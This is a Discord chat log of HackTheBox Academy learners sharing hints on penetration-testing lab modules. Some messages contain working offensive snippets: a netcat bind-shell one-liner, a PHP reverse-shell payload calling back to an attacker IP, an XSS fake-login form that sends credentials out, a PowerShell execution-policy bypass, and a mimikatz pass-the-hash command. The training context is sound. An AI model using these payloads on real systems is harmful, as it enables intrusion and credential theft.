#modules

i carefully followd it yet on my profile, i cant find my identifier

Make sure you on app.hackthebox.com not the academy.

Hello! I’m new!!

Welcome.
I recommend you to read #welcome and #rules

there someone who have done logrotate lab of privilege escalation in linux? i am stuck in which log file i have to use...

Check the user directory

Anyone done with the Footpriting module? Need some hints for the DNS section.

can i dm you?

Did it

sure

who can help me in this modulehttps://academy.hackthebox.com/module/143/section/1508

I can't find the bro's NT

Hello,
I was able to finish Password Attacks Lab - Medium, but for the last part it was combination of desperation/tips/luck. Could anyone explain me ||how I was supposed to know that we can use Dennis private key to login as root user ? Was I supposed to guess it from vim hisotry and bash history ?||

This thought is YES
Another thing is dennis was that only option left in that case, so trying and checking also comes into play

Password Attacks Lab - Hard
Can anyone help me in mounting xxxxxxx.vhd file ?

😭

https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0

Hi anybody tried registrytwo

The best way to ask is in #boxes

I dnt have access to that

verify yourself

#welcome

I'm using enterprise htb web application

And I really need a complete guide as I'm just a beginner into this path🥺

Ubuntu

Please now I need help I know it's not easy please someone should come to my aid😭
I've wasted enough time trying to figure it out myself please

what exactly are you struggling with?

Network enumeration with Nmap
Easy lab answer

I used this @heady tusk

Then this @heady tusk yet I still get Linux as the operating system

@heady tusk

yeah no need to tag me all the time I'm here 😄

have you tried banner grabbing? that's usually a good way to get more details on OS

With netcat? Yes I've done yet no clue

on which port did you try that?

So sorry I was already frustrated by the way this has stressed me how'd the hard lab now be?

80

your best bet will be port 22 as ssh oftentimes has a banner which tells you the exact OS you're dealing with

Yes I also saw Ubuntu as the banner yet not correct

ugh that should be correct. my answer says "ubuntu"

Is it case sensitive?

I'd hope not but who knows 🤷

With the quotation marks?

no without

The answers are case sensitive

ugh really? that shouldn't be the case for something like this though

For all answers in HTB

well yes, but having ubuntu and Ubuntu count as correct would be good in this case

Hello can i have some help for the "Footprinting Lab - Hard" stuck on snmp enum, i try a lot of snmp enum code without success

sometimes the services running on open ports reveals what OS is running on the machine

have you obtained a community string already?

no i just have the snmp version

then cracking a community string will be your next move

thanks found it

awesome 🙂

Construct a valid SSL 3.0 padding of the plaintext bytes "AABBCCDDEEFF". Use the byte 00 for any byte that can be an arbitrary value. Provide the padded plaintext without spaces. Assume the cipher suite TLS_RSA_WITH_AES_128_CBC_SHA is used.

Can Anyone help I'm trying everything but I don't know whats wrong.

Hello evereyone

Hi there, is anyone interested to stud together Bug Bounty! I'm already doing Server Side Attacks!

Hey guys,
I'm kinda stuck on Windows PrivEsc Skill Assessment Part 1. Trying to do PrivEsc but Juicy Potato just won't work and from what I read PrintSpoofer doesn't work either. Also tried Metasploit's 'getsystem' which in the past worked for SeImpersonate but that also failed. any clues as to what I should look into?

either of them will work, I used Juciy potato and it worked for me.

Could you explain where you are facing issue with

may I DM? I fear this is gonna be a bit longer

Sure

thank you!

Preparing for CPTS?

nop i use htb just for fun, im not thinking about getting certificates rn tbh

I see have fun then

is CPTS an important certificate?

I would say yes it is really good one to gain experience and learn awesome stuff

do you have to pay for getting it or it is just a certificate that you earn after a while?

You have to get it 210$ for exam

oh okay. don't think i will try it then, since i won't use it for getting a job

You have a job ?

It's a good cert and I'm enjoying the path so far but it's still not known in the industry

i spoke to some HRs recently and they all want nothing other than OSCP lol

give it some time💪

What Shell extension do I upload here?

Im supposed to upload a shell

I think .php?! im not sure why tho

i study computer science but not in cyber security. i find it fun to learn this stuff, but i don't think i will study cyber security at university

have you tried that?

the writeup says so @lusty thicket

does any of the wappalyzer results on the right indicate that?

Cool Good luck

yeah it's a good path and from what I have heard the exam is quite good too

what module and section are on?

@vital adder its tryhackme lmao

but that discord support isnt too good

only like 2 competent helpers

Im just asking abotu the screenshot specifically

no wonder that look familiar

does the webalyzer result indicate what extension the shell should be?

the new thing? just ask on thm discord

nope

what does then?

no idea what kinda of question is that 🤣 generally just use a php shell

also why tf are you asking it here

I wonder what would they say if he asks something about HTB on THM server lol

its not a thm related question

lmao I sometimes forget the average age here

thanks tho

doesn't matter this channel is for HTB academy module

i saw a lot people doing exactly that back on my THM days 🤣

lol

why have you chose htb and not thm? (just curious, never used thm before)

i do both

but not so much THM lately

the chonky squirrel still have a good rank on THM lol

I wish I could do both 😂 I don’t want anything taking me away from my leaning path here at HTB plus this discord community is super interactive

Best one I’ve ever been in

Lies

to be fair THM do have some good support because their main platform is about learning unlike HTB is for CTF

I paid for the yearly subscription maybe I’ll check it out what I find difficult here at HTB I’ll use THM to help me understand

the main selling point of THM is it's beginner friendly so stuff can get boring and doesn't go that depth

Super boring and they beat the concept into ya brain 🧠 with a lot of text so way more reading 📖

dang you spent a lot of time on THM then 😄

yea got the year bag on there

i started on thm

yeah I did too but only got up to 20k points. haven't done anything on THM for quite a few months now

Same

I will do the wreath Network

I started that but didn't get far cause I was busy with other stuff and then I kinda just forgot

do y'all know anyone who finished Wreath? if it's good I might do it eventually

that network is not the best but not bad at all also if you still have an subscription checkout the holo network that one is a better but you kinda have to follow the room (i think) doing that blind is a bit hard because the path is too custom

*pivoting and Tunneling

Port forwarding with windows Netsh

I am unable to rdp into victor in ip:8080 is there any error in the question ?

why it only shows public

if I am using snmp2

v2 still uses community strings if that's what youre asking

it's v3 that uses uname and pass

^

I am asking how can I bruteforce the strings with hydra

I mean

Listen you may not be prepared to hear what the public string is for that lab

Aka you're overanalyzing the output

with snmpbrute I can get the strings

with hydra I cannot that is what I am asking

¯_(ツ)_/¯

maybe hydra is stopping on first one it finds, I'd try hydra again with just the string internal and see if it picks it up

if not then hydra's snmp is flawed

where can I get technical assistance?

Contact the support

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

no assistance / consultion in here as well?

Depends on what exactly you're talking about.
The support usually does not read here

If you have questions about modules, etc, you can ask them here. But not technical support.

Hi guys, I'm struck in the heartbleed module. Could you help me, I have successfully exploited and got the private key using different method but they have asked for the d value, which I think can be only obtained by the process they used in the module. I'm not able to find the heartbleed.jar file. Could you give a nudge on this?

..

..

Hi there, I'm working on the web requests module, page 4, HTTP headers, supposed to use the browser devtools to find the request to the flag file, reset the target a couple times now and still not seeing it 😕 am I missing something?

Download TLS-Breaker like it mentions.

i believe the instructions where stated in the module

I just started with htb, I'm on tier zero I have no idea on how to get the root flag

and you have to refresh the page while the network tab in dev tools is open

I'm using kali linux as my primary os

what module are you talking about

Learn the basic of penetration testing, I believe

Thanks tips lol. I only see 2 get and a spawn/container/223 when I reload, nothing called 'flag_...'

Starting point

then you must be doing something wrong

there’s no module with that name lol

Probably 😆

Starting point. He is at starting point machines lol

the nibbles machine?

which machine specifically are you looking for help with?

yes, it’s supposed to be pretty straightforward

Can I dm you?

I'll try restarting the dang laptop...

bdw guys how do I know if my discord verification worked ?

you'll get a discord role

it didn’t

damnn I dont think I did anything wrong

I will check again

Meow

dont say that again

Lol😭 why?

What have you tried so far?

I've been able to download openvpn and launch it through my terminal, and answered a bunch of basic questions, answered all but the last step I'm to submit root flag and I don't know what to do

have you run linenum on the target machine?

check your nmap results. what's the port that is open? how can you use that information to get in and get the root flag?

All 1000 scanned ports on (Ip) are in ignored states

xD

what machine are you talking about?

Meow

Did you manage to log into the machine?

I'm guessing yes since you said you're only stuck at the last question. Unless you guessed the answer for the second last question.

If you get into the machine the flag is right there

Yes I did guess

I downloaded the VPN for machine, and in my terminal I did open VPN lab_pathname.ovpn

No not connecting to VPN

What port did you answer on your Task 6? What's the question and the answer for your Task 7? Use these information to log into the Meow machine as your Task 7 answer.

also #starting-point is the channel for asking questions about starting point machines

INTRODUCTION TO NETWORKING is very useful for pentesters? 🤔 I mean, we have some knowledge from Getting Started, NMAP etc.

What subject is important is this module.

That depends entirely on your previous experience.

I did SQLi, Getting Started Module, NMAP.

quick question. did you practice any machines before the exam or you know of any machines that'd be a good practice before attempting the exam?

I did not do any extra study for the exam - I went in raw. The only machines that can give you any kind of preparation are the prolabs, but I have not done them myself.

Alright thankss

23/tcp

what protocol uses port 23?

What username is able to log into the target over telnet with a blank space and the answer is root

telnet

Telnet

I hate to be asking for help on something that looks to be so basic

yes im trying to hint him towards the right direction haha

I am on the Laudanum module

haha

after uploading the demo.aspx file

I brows to http://status.inlanefreight.local/files/demo.aspx and 404 error

great. now how'd you use telnet to connect to Meow as root?

I tried \files\demo.aspx

same

can anyone point me to what I am doing wrong here

Im sure it is something stupid

you have everything you need. you just need to figure out how to use this information now

Telnet Ip
Meow login is root
Password I just hit enter

Nice. You did it

Just cat the flag now

hello y'all, I'm having this behavior with Attacking FTP from Attacking common services

the nmap result says the ftp accept anonymous connection but, when I tried to connect the conection is refused

anyone experienced that behavior?

Just did thanks alot, I think my problem is that I Googled and guess some of the answers

Can anyone help me with this?

I'd recommend taking a step back and going through some of the basics first. HTB Academy has some great modules and you'd find plenty more on YouTube for free.
Good luck!

Figured it out

Im a dummy

This is a very finnicky lab. You may need to respawn the target 5 times or so before the FTP service opens. You should also wait about 2 minutes after spawning the target to wait for FTP to load. Working on the same section right now.

kewl, can I DM?

For sure!

hello, I am in "Find the password for the ldapadmin account somewhere on the system" in winPrivEsc assessment one. Does anyone have a hint, ive been looking for quite a while now

INTRODUCTION TO NETWORKING is very useful for pentesters? 🤔 I mean, we have some knowledge from Getting Started, NMAP etc.
What subject is important is this module.

I did SQLi, Getting Started Module, NMAP.

This will help you when you are in Pivoting and tunneling modules and also when there are internal stuff running or you have to connect to host that are not on same network

I mean you should understand the basics of networking. Wether or not you need intro to networking is up to you

When I first started learning I sat down with TCP/IP Illustrated books and devoured like 3k pages on the subject

Forgot most of it but what I retained was a suitable foundation of networking

I read a blog it was not all about it but it was great resource

https://explained-from-first-principles.com/internet/

Bc I would like to pass EJPT before december and I would like to know which modules in HTB is useful :).

It is actually all of about networking stuff

Go for CPTS pathway it is a lot but it is not gonna hurt you

It's too for EJPT.

EJPT is a starter certif, not a expert certif.

Dude then I would recommend complete the information security pathway

And prepare for exam with course content

Interesting that OffSec is rolling out OCR Blue (defensive training) right as the Academy is rolling out their defensive lineup. 🛡️ Its nice to see these stellar blue team training modules becoming available.

?

Alr :).

hello everyone..amy someone be kind enough to sponsor a voucher of gift card for academy? i am short on cubes. DM me

I am thinking of switching from CPTS to CBBH because I want to bug hunt really badly

and I think CBBH might be more focused

will complete Nmap module and then immediately transition

then can do CPTS later I guess

Module: Documentation and Reporting. Section: Lab. I completed the lab already but practicing Linux privesc techniques + command injection on the Linux machine. Already got in as www-data and looking around. Possible to get root on this box?

After this
I...... become so NUMB......
I can't 😂 feel you there...!

Thank you soo soo much @heady tusk and @tidal mango
HTB tore be apart... 😂

Upto Password Attacks of CPTS path, if anybody need any help feel free to ping/DM me up.

Will be glad to help

😁

oh man IMAP commands Yuck

IMAP 🤢

hurts my eyes

Does Evolution work for this section? - I can't get it to connect. https://academy.hackthebox.com/module/116/section/1173

gonna have to telnet

https://tenor.com/view/haha-yay-yippie-minions-not-happy-gif-14651581

Could be 'evolution'ary to try.

Thanks, would try and get my Linux and network basics

sup yall

working on teh footprinitng hard lab and cannot load the ssh key

keep typing ssh -i id_rsa USER@IPaddress and getting LOAD KEY "id_rsa" invalid format

hey @rain briar although i dont have access to that module but you could try simple steps like: ___ 1. delete all old key files that might cause confusion and download a fresh key
2. make sure to check the permissions of key file before running ssh'ing
3. ssh -i ~/.ssh/id_rsa username@example.com -p xxxx

please do correct me if I am wrong with any of the steps i am kinda new

remember to fill in VHOST

One question about kerberos

the KDC can be a different machine than the DC right?

you can host the KDC in one server

and the DC in other one right?

Anyone completed the introduction to AD

I couldn't get it to work before. I just retried, thnx

I'm not an expert, but I don't believe so.

Yeah I don't either

https://learn.microsoft.com/en-us/windows/win32/secauthn/key-distribution-center
The KDC for a domain is located on a domain controller, as is the Active Directory for the domain.

nice find

ok thanks

How did you get rid of the image from the url?

Click on the x next to the image

👍

Can anyone help me in Threat Hunting & Hunting with Elastic Skill Assessment? I'm really having a hard time

You have to sudo chmod 600 to it

Attacking Common Services - Easy - You don't really need a full rev shell for this one fyi

Hats off fr to though's that took that extra step.

Also, ||check the OS. You can't just copy and paste commands from the cheatsheet. Gotta alter things.||

Do you guys know if their is a way that I could try to do hack things off of my phone? I don't have a PC or laptop so I can't really do anything

You can do things with net hunter
But in some areas it's limited in vs to PC

Can you DM me the things that I need or no?

if you are new here read #welcome and #rules this channel is for HTB academy modules

Oh sorry

Hello, There are some modules that do not have an practicing lab . Do these come with exam?
such as Attacking XSLT , ESI --> SERVER-SIDE ATTACKS

Hello guys i foing a privilege escalation i gound a tomcat server running i logged in with credentials im just wondering if tomcat9.0.31 is venurable to any exploit ? Giving more privileges ?

i have a question for the Server-Side skills assessment|| is it normal if i didn't do any Server-side attacks but just JS deobfuscation?||

JS deobfuscation will assist you in Server-side attacks.

nc -lvnp 4444
Listening on [any] 4444 .....

stuck on this and show nothing, anyone can assist me?

you've set up a listener, and until something hits the port you've specified in the listener nothing will happen

what should i do

depending on the case, usually a reverse shell

can i dm u?

go ahead

friend request sent

my case is on starting point unified

Well, Unified has a walkthrough that can help you solve the machine

Additionally, you can check #starting-point

correct

but stuck on this :(((

~

AD Enumeration & Attacks - Skills Assessment Part I - Submit this user's cleartext password. - I can't seem to crack ||t***ty's|| password, Ive got the NTLM hash from ||Mimikatz||

If you have the NTLM hash, then it should be crackable with the rockyou password list.

Ok, let me try again

It doesnt work

Did you try rockyou

yes

Oh

I did a ||LSA dump|| and found the password in clear text

👍🏼

Are there any good modules that teach about evasion techniques? I want to start Offshore soon and it makes me realize that I am probably not prepared for any AV or EDR

can i only do 1 module a day? i just did the intro to HTB but now i can't use the screen for another course

Pivoting and Tunneling module

Port forwarding with Windows Netsh
I uploaded the dnscat2.ps1 but when I transfer this to my pivot host PowerShell blocks the execution and HTB did not mention that you need to bypass it or jot

No, unfortunately there are no such modules so far.

PowerShell blocks external modules or scripts from being loaded by default. But you can work around this. It is also shown in the modules.

Set-ExecutionPolicy Bypass -Scope Process

I was trying to bypass that with encoding and stuff and it was not working thank you am gonna try this one idk how I did not remember this

iirc the metasploit module talks about antivirus evasion when crafting a payload, and on Active directory enumeration and attacks module, you have some information about antivirus enumeration and evasion

Yea I remember shikataganai and some stuff about not dropping files on the drive but launching from memory instead, but that’s basically all

hi! i have a question regarding module 103 - cross site scripting exercise

i have followed the instructions with regards to the payload

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();

however i do not get the desired "look" of the page.

it seems broken

The modules are usually structured in such a way that you cannot apply them 1:1. You have to change your code a bit most of the time.

ohh that makes sense

I'm trying to start with the very first mod in htb and have bought vip but I'm about to unsubscribe as the very first thing cant even be completed because it refuses to detect I've spawned a machine on the website. I've done so about 10 times with it never detecting its done so I cant do anything

wdym?

Can you send screenshots and what module are you working on

I am working on screen shots right now

2nd tab is the open machine but it still says I have to spawn the target machine and the ip will show

oh, that's on the main platform, try refreshing the page.

I have 15 different times

Why there are 2 connections ?

that I dont know because I only have 1

idk what's the problem tbh, but as PTShinobi pointed to the two connections, try reseting ur vpn. and see where that leads, if it doesn't help, u can check with support i think and assk on #1024429874246590575

hi guys im in the middle of the footprinting module and sqlplus is giving me this

any chance oe of you has come across it before ?

check if the oracle library is installed on your vm

Could anyone help me with the Attacking Common Applications - Skills Assessment II?

i figured it out in the end its actualy listed in the module

yes

What do you need help with?

On the first question "What is the URL of the WordPress instance?"

I've made fuzzing to search for subdomains but nothing

what about other ports ?

#modules message

Look at the text of the task again.
There is a vHost that you should better investigate.

Could I DM?

sure

can anyone help me in dms about shell anatomy module

I think the user has joined any season running box and then joined normal boxes.

Similar happened with me

Hello everyone. The most comprehensive and cutting edge NTLM relaying material was just released. Hope everyone likes it 🔥

Why don't the new modules get new cool badges anymore?
Cool modules should get cool badges

I think this is the default one until they are assigned one

Yes, I suppose so.

hi @kind turret can i dm you for a bit? i just have some question about getting into module development

Maybe the HTB graphic designer is on vacation 🙂

Hi, can anyone help me with assembly? Got stuck on a basic assessment task

Hi Guys Im in the Footprinting Lab Easy i have the comand to get the keys says its downloading files gives me the number of files downloaded and the size but somehow the folder is empty

I beg to differ here @Pedant...I'm currently on the same exercise in the CRLF log injection attacks section and the question asks you to get command execution by injecting into the log file. The example it gives is PHP injection into the logs. However, anything you attempt to inject into the log, for example %0d%0a, or < or > or %3c gets stripped out by something and so doesn't work. So there is clearly some kind of filtering happening which I assume you have to bypass to achieve RCE?

Active Directory Attacks and enumeration, I am stuck on the question that asks me to comprimise the Domain Controller, Ive got the Hash of the password of some important accounts but I cant crack them

You can’t pth?

Not to my knowledge

Is it possible to pth?

wait, I am hungry

I came across this page:
This guy literary copied and pasted htb's content as his article. Even with flags visible. Is this even allowed? Should this be reported?

It should be reported, and not shared here.

ok, deleted the link. Who I report it to?

Use site support.

got me here lol. I'll look around. Thanks

Idk? You tell me?

Yes

wait how? did support redirect you here or the bot (forgot the name)

It is, but I have to find out how to do it in my scenario

hehe

no, I was looking how to get in touch with someone. THe support page just show faq's.

I started a chat on htb's page. that should do 🙂

oh then in that case report this to people at support when you get in touch with them

or i actually have report thing like this to @west canopy before maybe give him a ping about this

shoot me a dm on what the hell are you trying to here 🤣 (the download command is ||get||) if you still need help

Guys how I can enable bidirectional shared clipboard in htb academy machine???

use Full Screen

I think htb should currate their random(??) username list ||inlanefreight.local\luder1954 ||

find / -type f -name *.config -newermt 2020-03-03 -size -28k -size +25k

Could someone give me some guidance on what I'm doing wrong? I'm getting about 100+ files with this specification

No, cuz its on a seperate computer lol

Just a hunch, but could it be that there is a difference between modify and creation time?

yeah this ones getting me, I tried just newer and I don't think that's a command

the only command the module has taught at this point is newermt

which module and section are you on?

Try the man pages, part of htb academy is also googling things you don’t know. Look for newerXX , the flags like m and t are described separately

Linux fundamentals, files and directories - I think I'm getting closer. And trust me, I'm not asking you as my sole resource I'm definitely digging for this.

I try to avoid asking for help here unless I'm really stuck, as typically people make comments shaming that as if one is not resourceful =p

this is good because some people just give in a ask for help right when the first thing they try doesn't work 🤣 don't want to point finger because there is too many and i don't have enough finger

Hello, I still stand by that it is not about bypassing filters. DM me to get a converstation about it 😉

you can check the search, I never ask here. I thought maybe

find / -type f -name *.config -newermt 2020-03-03 ! -newermt 2020-03-03 -size -28k -size +25k

would fix it, but still kicks back a few hundred files. still digging in

It may be wrong, but I go to GPT for most of my help because it can really break things down very precisely

that's weird i have this command in my note but with .conf (not config) and the 2>/dev/null for dealing with the error part

oh man, it may be the .conf.

yea give that a try if you still get like 100+ file i'll double check it

it would be something small like this -_-

use 2>/dev/null at the end of your command

Gotta get to work, I'll circle back in a bit.

oh no that is just for filtering out the permission denied

I tried ||sekurlsa::pth /domain:INLANEFREIGHT.LOCAL /user:administrator /ntlm:<Hash> /impersonate||, but I can't get it to work, I am still on the MS01 Computer and I can't list files on the DC01 computer

@hexed void ok so as far as my ape brain can see both of your command is the same if this is the case and you count the error as an output then that's the issue

just give your command a try with the 2>/dev/null thing at the end (for filtering error) and that five me back 1 single file

*with the .conf

I keep having issues logging into the workstation in the Active Directory Enumeration & Attacks section. Has anyone else experienced this? I know I have the credentials correct as they are just the standard ones on the page, so unsure as to what it could be.

Are you typing the password out?

literally copying and pasting it

then re-checking

100% not

have also tried typing to see if I am going crazy but nope

I've also restarted the machine numerous times

It's annoying as I cannot progress as I need to now use tool on a domain joined windows host

what tool are you using for this?

as in what RDP tool? redesktop or xfreerdp

if you mean by needing to progress, snaffler

this is have spoiler shoot me a dm, i'll help you troubleshoot

Thanks

any idea how to solve this question, module DOCUMENTATION & REPORTING ? Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him? (Answer format: [key] + [key] + [key], i.e., fill in the values for "key" and leave the brackets and + signs.). i have inputed [ctrl] + [b] + [%] as anwer but its wrong

hello,
I am doing web request - header request.
And I found the flag_... in the request header. But the flag is not accepted, what can I do?

have you checked in the network tab raw response headers?

yes. I have submitted flag....txt, flag..., the whole response header, and any combination I can think of. But nothing was accepted.

sorry, my bad. I have the answer.

The answer is explicitly in the module's text, copy what it says there

I ran into the same issue as well

@trail leaf can i dm you

why ask when you were going to do it anyway

also just ask here lol

Anyone able to DM for help with a module? I've spent hours on this and I'm honestly getting pretty over it.

find / -type f -name *.conf -newermt 2020-03-03 ! -newermt 2020-03-03 -size -28k -size +25k 2>/dev/null

just gives me an empty line afterwards

Not sure I follow what you mean, I don't know the file name that's what I'm searching for by specific criteria. the examples given by the module show me it wouldn't be -type *f

There's over 100 files in this SSH that are .configs between 25 and 28k in size

it wants "the one"

start reading 😉

jk I havnt done that question

This is the first time I feel like the material did not set me up to be able to figure this out, hence me coming here. And theres been some tough ones coming up to this.

which module and section is it again?

find files and directories, linux fundamentals

gotcha havnt done that module sadly

I dont think the -newermt ! -newermt will get you what you need. That would restrict the search on files modified exactly on that date, you need one created after this date

you could try -newerBt to look for a birth date newer than the provided date

yeah I think its just -newermt, not both

we haven't learned newerBT yet

the one newermt would mean files created after that date, which is what it wants

in my head modifydate and creationdate are not the same thing

and dont expect the module to teach you the exact command, the assessments are often set up in a way that you need to research a little yourself or modify the example from the module text to make sure you really understand what you are doing and not just copy pasting the module content

yup very common theme

assessments are almost exclusively designed to challenge your conceptual knowledge, not your rote memorization and ability to yo follow given steps

I tried the command you posted above (without the ! -newermt 2020-03-03 part) and it gave me the correct file

?

how do you know its the file if you didn't specify its creation date?

find / -type f -name *.conf -newermt 2020-03-03 -size -28k -size +25k 2>/dev/null

just the 2nd part I mean

it runs a few seconds and returns one line, the file you need

Honestly, looking at that code, I feel like I've run that exact one like 3 times so I'm kind of at a loss. But thank you

I need to spend more time understand the dev bit at the end.

I think when you tried this earlier you did it on *.config and then by the time you switched to *.conf you added other stuff to the command that made it not work

the 2 > /dev/null can be used behind any command to redirect the error output to a file, our "file" in this case is /dev/null which basically means "discard all error messages". Otherwise your output gets spammed with "Permission denied on file xyz"

that makes a lot more sense. thanks man.

This one got me pretty frustrated lol. I'm gonna saturate on this one for a while.

yeah 2>/dev/null is a game changer. everything seems to line up with it.

I tell ya what I learned today: services can hide inside other services! hahha
I just completed the Password Reuse / Default Passwords box inside the Password Attacks module.

Makes me wonder what services were hiding in other boxes when I just did an nmap and assumed that's all there was to find...

wdym services hiding inside other services

the ||mysql only accessible once you're already in ssh||

Thats not a service hiding inside another service

thats because the firewall was blocking access externally

but once you have access to the host, well firewall isnt gunna block the host from itself now is it?

yeah true that's a more accurate way of describing it

but not as fun

Its a meaningful difference

Because there can be conceivably other ways to reach that service that had nothing to do with ssh. So thinking it of a service inside another service is very limiting to your mental model of the target

yep, good point

as opposed to something like a service running inside a docker container which could be reasonably viewed as a service inside another service and would warrant a different line of thinking to tackle

hahah I tell you the second thing I learned today....

hey thanks for pulling me up on that lazy thinking. I'm now sitting here revising a bunch of my notes as a result.

np

Hey guys

Hello guys

@mortal echo Hello mates

Can anyone please explain the bin shell with netcat module code: rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f ?

Each individual command makes sense, but I don't see how this gives you a bind shell.

Also the module is unclear as to whether the IP is the attack box or the target.

explainshell.com didn't give enough detail

I've done some searching and everything I've found is related to stderr and stdout.

ChatGPT might be able to iterate it better for you. Also, the IP is your ip a ip.

The next command is nc -nv 10.129.41.200 7777 from the attacking machine though, so wouldn't we just be connecting back to our own machine?

That's where I'm confused

The key there is that it uses a fifo object, in order to redirect input/output. Output of what happens in the bash shell is sent to your netcat listener. Input from the netcat listener is sent to the fifo, which creates the loop, feeding back into bash.

I'm starting to understand the breakdown a bit, I just don't see how we get a shell from the attack machine when the -l is on the target

how i can get numbers in a specific range using the grep command?

I also don't understand the "cat /tmp/f" portion. We haven't put anything in that file, what is it concatenating, or does that come later in the lesson?

That's reading the fifo. Try to make a fifo object and mess with it.

So let's see if I have this correct: We remove tmp/f if it exists, put a FIFO object there, which is kind of a placeholder, and then concatenate it, but at the same time that concatenation is piped to a shell (/bin/bash) where stderr and stdout are combined into an interactive shell, and then that's piped to a listener with the IP of the attacking machine which writes each command back to the FIFO being concatenated, which then effectively gives us the abilty to connect with -nv and get a shell.

I think the IP is the target IP

now that I'm painfully wrapping my head around this

please correct me if I'm wrong, and thank you both for the help @proud pine and @gloomy bramble

Here is a sample of one I use sometimes: <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.XXX 4444 >/tmp/f"); ?> That is my ip a ip

It's specifically the tun0 ip

ip a just shows all ip interfaces

yea, my bad, i just meant that I use ip a to find that ip address. should have said tun0, thanks for the correction.

ah, I see, so you would ip a on the target machine to find tun0?

Did my explain what I think I just learned back to myself like I'm 5 version sound close to what's going on?

؟

The IP it uses is your local IP.

You run a nc listener, waiting for that payload to connect to you.

So in the case of the VPN connection, yeah, it would be your tun0 IP

In the case of an over-internet situation, it would be your WAN IP, and in the case of a pivot situation, the 'next hop' before it reached you.

??

Use regex https://www3.ntu.edu.sg/home/ehchua/programming/howto/Regexe.html

grep should support regex without supplying any new flags iirc, but it's definitely been more consistent if you use the -E flag

Even for a bind shell?

Oh, I didn't see you had used a bind variant.

yeah, my bad, I realized that detail wasn't inherent to my question.

So it would be their IP?

I don't think I've ever used nc for a bind shell, but yeah, it looks like you can specify the IP for -l, and you'd use whatever is facing your attack box.

Okay, makes sense. Thanks for the help.

The rest of the function of the shell command remains the same, since the loop it built is just based on the input/output from nc and bash.

Hi there, i'm working on the module Windows Priv Esc, and am currently at an impasse on the Skills Assessment I page, where I have a low priv user powershell on the target system but can't find the credentials or escalate my session using JuicyPotato or PrintSpoofer. Any help or nudge in the right direction would be appreciated! thanks!
Edit: NVM Solved!

yo guys any idea on the catch the flag cft input key?

i can't seem to connect ssh for this

ssh username@ip

just saw that. 🤦‍♂️ thanks for the quick reply though

any tips on how i should go about with this?

Google it tbh

i did and got the answer. didn't occur to me when i got stumped. will be a point of reference in future 🤣

Thanks for not taking my statement as sass lol. There's a fair bit of googling needed/required to get some things down

i remember seeing that and somehow am glad the concept of 'google' came up from the back of my head came up before i read it here 🤣

i saw that as a honest opinion, we cool

Hello everyone,
I'm seeing many people complaining about the module "Password attacks - Cracking file".. So I'm just another one 🥳
The question is:
Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.

My analyze:
We can see the port 21 (ftp) is open on the target. We have a login: Kira.
Goal:
Mutate the password list with rule in resources, apply it on the password list.
So I tried to : hydra -l kira -P The_Password_list_mutated.txt -t 48 ftp://Target_IP

Problem: the bruteforce will take 3h30 to try all of them.
Question 1 : Do we have Kira password? (I checked other module in password attacks, nothing)
Question 2: Is that the correct plan? (mutate the passwordlist + bruteforce)

Thanks in advance and have fun 🫡

Edit: The plan was correct, we have to wait 15min

kira - lowercase is important here. You can increase threads

But also this is the same kira from earlier in the module

Yup you're right, we can put on hydra "-t 64"
Looking for the password, yes... I was pretty sure I already saw it somewhere.. But forgot where x)

be careful with too many threads on hydra, too many connections can make it time out valid attempts and accidentaly skip credentials

correct, I re-tried to cracj the password for kira on ftp with -t 64, Hydra didn't found it, but with -t 48, it find it correctly

Good morning guys

@dusky rivet sup man

🫡 sup big boy

I'm good man and you???

Are you an hacker like me too man ???

Good thanks! Yes I try to become better in this everyday! Next month I hope I could do the CPTS

is the lab broken for xss hijacking? i can't seem to send the request when i click register

should i take part in ctf events even if i have not completed teh modules yet or should i wait for ctf

u will apply for certificate?

Try. If you can do it, perfect. If not, keep learning

Make sure you're launching the connect command from a writable directory e.g. /tmp/

What is the error you're getting from smb?

Are you sure you're doing the connect command correctly?

You need to blur out any names/passwords my guy

Well have you actually tried connecting AFAIK smbmap only scans it doesn't do interactive connection

*I haven't used smbmap much

I didn't use smbmap so wouldn't know. Just used standard smbclient ¯_(ツ)_/¯

can anybody help me with logrotate ?

Ask your question more specific

Hello, I'm doing the NMap module on HTB Academy and just wondering if there is a quicker way to run NMap scans on my own VM as they are taking a while

Hi, is anyone available to help with the Linux File Transfers module? I am unable to use gunzip to extract the zip file.

Perhaps you could use a -T4 flag?

Hello! I'm stuck on the Documentation and Reporting practice lab. I can't work out how to get Domain Admin. I got a lot of hashes through Responder and cracked them all, but when I RDP in that server is not the DC. I looked through all the findings and found that the DC IP is ||172.16.5.5|| but none of the other credentials got me in. I feel like I'm overthinking this, can someone give me a nudge?

I think it's just a regular zip file you can unzip

Gave that a go but unzip isn't installed on the target system

and using the hint command just throws an error because the file isn't a .gzip

Target system is windows yeah?

linux

Second question from the Linux Transfer section

a quick google give me
https://nudesystems.com/nmap-timing-options-when-and-how-to-use-them/
and
https://nmap.org/book/performance-timing-templates.html

Try tar -xf {filename}.zip

I have moved on for now, but thanks for the solution 🙂

https://www.makeuseof.com/zip-unzip-files-command-prompt-powershell/

This isn't the place. Read #welcome and #rules

if you are new here read #welcome and #rules if you are on HTB use /verify at #bot-commands to verify your account, this channel is for HTB academy

Ok

Diamond And Sapphire Tickets needs to be on attacking kerberos

which modules are a must for starting easy machines in HTB? if there are any. i don't want to start too early

I'm stuck on the Footprinting NFS module. When I attempt to mount the NFS share, I get the error: mount.nfs: access denied by server while mounting 10.129.202.5:/. I have tried appending the file paths shown when I run showmount -e, but get the same error. I know this is probably a simple issue, but I've been stuck on this for hours. Google and ChatGPT have proven unhelpful. Any advice?

https://academy.hackthebox.com/module/116/section/1468#questionsDiv - Attacking Common Services - Hard - yo this assessment is a pain. I learned SQL syntax I never used before in PWK.

You solved it lol ?

https://tenor.com/view/yes-sweet-hell-pump-it-gif-24781033

Pivoting and Tunneling

I'm not even close to that yet haha

